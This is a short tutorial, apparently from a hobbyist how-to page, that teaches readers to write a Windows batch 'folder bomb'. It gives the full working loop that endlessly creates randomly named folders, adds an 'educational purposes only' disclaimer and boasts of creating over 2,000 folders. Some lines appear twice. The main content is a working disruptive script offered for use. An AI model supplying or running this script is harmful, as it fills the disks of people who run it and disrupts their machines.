Folder Bomb Batch File
This is probably the most simple and productive batch "virus" there is.
It makes infinite folders named different numbers.
It makes infinite folders named different numbers.
Open Notepad
To open note pad goto start menu ,and type note then look for note pad. Notepad is a free program that comes on any windows computer it is a lot more powerful than most people think.
Coding
Now here is where i say I'm not responsible for anything you do with this... This is for educational purposes only. Now this code is extremely easy. The code is:
@echo off
:1
Md %random%
Goto 1
@echo off
:1
Md %random%
Goto 1
Final
That was over 2,000 files created. That is what it does.